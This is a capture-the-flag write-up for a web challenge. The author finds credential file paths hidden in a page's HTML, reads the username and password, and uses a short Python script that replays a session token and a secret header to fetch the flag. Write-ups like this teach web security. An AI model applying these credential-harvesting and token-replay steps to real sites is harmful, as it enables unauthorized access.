Tags: web
Rating:
# Slowly Downward
## Description
```
We've found what appears to be a schizophrenic alien's personal blog. Poke around and see if you can find anything interesting.
http://slow.martiansonly.net
```
## Writeup
Starting off, we can look at the `html` of the website.
```html
<html lang="en">
<head>
<meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1.0">
<title>N O T I T L E</title>
<link rel="stylesheet" href="/static/style.css">
</head>
<body>
<div class="container">
<h2>Small Thoughts:</h1>
<nav class="thoughts">
<div style="display: none;">
<div id="A_MAN_WHO_THINKS_HE_IS_A_PIG">ANTIBIOTICS</div>
<div id="A_QUIET_AFTERNOON">NO SURPRISES</div>
<div id="A_WET_NIGHT">COLD</div>
<div id="ACTING_WITH_CERTAINTY">IF WE GET THE CHANCE</div>
<div id="AIRBORNE">PLANE</div>
<div id="ALIENS_AGAIN">THEY'RE TRYING TO LOG IN</div>
<div id="AN_ACCIDENT_INVOLVING_TRELLIS">PLANET</div>
<div id="ART">HILLS</div>
<div id="BIG_BIRD">MEMORY</div>
<div id="BOND_JAMES_BOND">SOMETIMES I FORGET CURL. I NEVER TRUSTED DANIEL STENBERG.</div>
<div id="DOWN_IN_THE_TUBE_STATION">TRAIN</div>
<div id="DRACULA">FLOW</div>
<div id="HAPPY_STORY">MEMORY</div>
<div id="HAUNTED">ABYSS</div>
<div id="LOVE_STORY">MEMORY</div>
<div id="MACHINE">FUTURE</div>
<div id="MUSEUM">SPIRAL</div>
<div id="NEARLY_GOT">FINGERS</div>
<div id="ON_SUNDAYS_RINGROAD_SUPERMARKET">TREES</div>
<div id="SHEARS">THIS IS IT</div>
<div id="SHOPPING_IN_THE_EARLY_MORNING">WARM</div>
<div id="SPACE">HEROES</div>
<div id="STATUE">EYES</div>
<div id="ADMIN">username@text/credentials/user.txt password@text/credentials/pass.txt</div>
</div>
<script>
document.querySelectorAll('.thoughts a').forEach(link => {
link.addEventListener('click', function(event) {
event.preventDefault();
const targetId = this.getAttribute('href').replace('.html', '');
const content = document.getElementById(targetId).innerHTML;
alert(content);
});
});
</script>
</body>
</html>
```
Looking through the webpage we can find a `username` and `password` file.
`username` file location:
```
http://srv3.martiansonly.net:4444/text/credentials/user.txt
```
Content: `4dm1n`.
`password` file location:
```
http://srv3.martiansonly.net:4444/text/credentials/pass.txt
```
Content: `p4ssw0rd1sb0dy5n4tch3r5`.
Using these credentials we can login on the webpage `http://srv3.martiansonly.net:4444/abit.html`.
Trying to read the flag from `http://srv3.martiansonly.net:4444/text/secret/flag.txt` still returns insufficient permissions.
We can switch to python to send a proper request.
```py
import requests
baseURL = 'http://srv3.martiansonly.net:4444/'
sessionToken = '1e6ec9f9c268cd2d7bbc197e3bcc8a5c' # Extracted after manual login
headers = {
'Authorization': f'Bearer {sessionToken}',
'Secret': 'mynameisstanley', # Extracted after manual login
}
res = requests.get(f'{baseURL}text/secret/flag.txt', headers=headers) # URL extracted from sourcecode of /abit.html webpage
print(res.text)
```
Executing this returns the flag which concludes this writeup.
```sh
$ python3 .\req.py
shctf{sh0w_m3_th3_w0r1d_a5_id_lov3_t0_s33_1t}
```
